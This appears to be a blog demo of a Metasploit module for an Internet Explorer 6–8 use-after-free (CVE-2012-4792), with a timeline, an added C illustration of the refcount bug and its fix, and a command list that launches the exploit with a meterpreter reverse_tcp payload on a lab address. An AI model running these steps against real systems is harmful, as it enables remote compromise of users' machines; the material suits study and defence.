Microsoft Internet Explorer CButton Vulnerability Metasploit Demo

Timeline :

CVE reference assigned on 2012-09-06
First samples of the attack discovered in Google cache on 2012-12-07
Vulnerability discovered exploited in the wild on CFR.org around 2012-12-26
Vulnerability details provided by binjo, Eric Romang and FireEye on 2012-12-29
Microsoft Security Advisory published on 2012-12-30
Metasploit PoC provided on 2012-12-30
Metasploit module name changed on 2012-12-31

PoC provided by :

eromang
mahmud ab rahman
sinn3r
binjo
juan vazquez

Reference(s) :

CVE-2012-4792
MSA-2794220
new IE 0day coming-mshtml!CDwnBindInfo object use after free vulnerability
Attack and IE 0day Informations Used Against Council on Foreign Relations
CFR WATERING HOLE ATTACK DETAILS

Affected version(s) :

Internet Explorer 6
Internet Explorer 7
Internet Explorer 8

Tested on Windows XP Pro SP3 with :

Internet Explorer 8

Description :

Note: The module name has changed from ie_cdwnbindinfo_uaf to ie_cbutton_uaf

This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CButton object is freed but a reference to it is kept and used again during a page reload; the invalid memory that is then used is controllable, which allows arbitrary code execution in the context of the user. Please note: this vulnerability has been exploited in the wild, targeting mainly China-, Taiwan- and US-based computers.
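The sentence above is all this post gives on the mechanism: an object is freed, a reference survives the reload, and that stale reference is used. The C program below is an added illustration of that lifetime bug and of the fix, written for this page; it is not IE/MSHTML code and not part of the Metasploit module. It models a reference-counted element, a script-side holder that keeps a pointer to it across a reload, and shows the raw-pointer binding (which dangles) next to the counted-reference binding (which keeps the object alive until its last user is gone). The type and function names (Element, Holder, document_reload, and so on) are assumptions of the toy model; a small registry of live objects lets the demo report a dangling pointer by address comparison rather than by dereferencing freed memory.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Constructed toy model of a reference-counted DOM element and a holder that
 * keeps a pointer to it across a document reload. Not IE/MSHTML code. */
typedef struct Element {
    int refcount;
    char tag[16];
} Element;

/* Registry of live objects, so the demo can report a dangling pointer by
 * address comparison instead of dereferencing freed memory. */
#define MAX_LIVE 8
static Element *live_objects[MAX_LIVE];

static void track(Element *e) {
    for (int i = 0; i < MAX_LIVE; i++) {
        if (live_objects[i] == NULL) { live_objects[i] = e; return; }
    }
}

static void untrack(Element *e) {
    for (int i = 0; i < MAX_LIVE; i++) {
        if (live_objects[i] == e) { live_objects[i] = NULL; return; }
    }
}

static int is_live(const Element *e) {
    for (int i = 0; i < MAX_LIVE; i++) {
        if (e != NULL && live_objects[i] == e) return 1;
    }
    return 0;
}

Element *element_create(const char *tag) {
    Element *e = calloc(1, sizeof *e);
    if (e == NULL) return NULL;
    e->refcount = 1;                       /* the document owns one reference */
    strncpy(e->tag, tag, sizeof e->tag - 1);
    track(e);
    return e;
}

void element_addref(Element *e) { e->refcount++; }

void element_release(Element *e) {
    if (--e->refcount == 0) {              /* last reference gone: free for real */
        untrack(e);
        free(e);
    }
}

/* Script-side holder: the piece of state that survives a reload. */
typedef struct Holder {
    Element *target;
    int owns_ref;
} Holder;

/* Buggy binding: raw pointer, no reference taken. */
void holder_bind_raw(Holder *h, Element *e) { h->target = e; h->owns_ref = 0; }

/* Correct binding: take a reference, so the element outlives the holder's use. */
void holder_bind_ref(Holder *h, Element *e) {
    element_addref(e);
    h->target = e;
    h->owns_ref = 1;
}

void holder_unbind(Holder *h) {
    if (h->owns_ref && h->target != NULL) element_release(h->target);
    h->target = NULL;
    h->owns_ref = 0;
}

/* Reload: the document drops its reference to the element it created. */
static void document_reload(Element **doc_elem) {
    element_release(*doc_elem);
    *doc_elem = NULL;
}

/* Returns 1 when the holder's pointer dangles after the reload (the UAF precondition). */
int scenario_raw_pointer_dangles(void) {
    Element *button = element_create("button");
    Holder h;
    holder_bind_raw(&h, button);
    document_reload(&button);              /* refcount 1 -> 0: freed, holder not informed */
    int dangling = !is_live(h.target);     /* address check only; never dereference */
    h.target = NULL;
    return dangling;
}

/* Returns 1 when the counted reference keeps the object valid across the reload. */
int scenario_counted_reference_survives(void) {
    Element *button = element_create("button");
    Holder h;
    holder_bind_ref(&h, button);           /* refcount 2 */
    document_reload(&button);              /* refcount 1: object still live */
    int ok = is_live(h.target) && strcmp(h.target->tag, "button") == 0;
    holder_unbind(&h);                     /* refcount 0: freed with no remaining user */
    return ok;
}

int main(void) {
    printf("raw pointer dangles after reload: %d\n", scenario_raw_pointer_dangles());
    printf("counted reference survives reload: %d\n", scenario_counted_reference_survives());
    return 0;
}
```

The first scenario is the shape of the bug the advisory describes: the document's teardown on reload is the free, and the holder is the surviving reference. The second scenario is the standard fix for that class of bug in refcounted object models: every party that keeps a pointer must hold a reference, so the object cannot be freed while anyone can still reach it.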

Commands :

use exploit/windows/browser/ie_cbutton_uaf
set SRVHOST 192.168.178.26
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.26
exploit

sysinfo
getuid

28 thoughts on “Microsoft Internet Explorer CButton Vulnerability Metasploit Demo”

  1. Can you provide me download link of affected internet explorer version on my email id plz
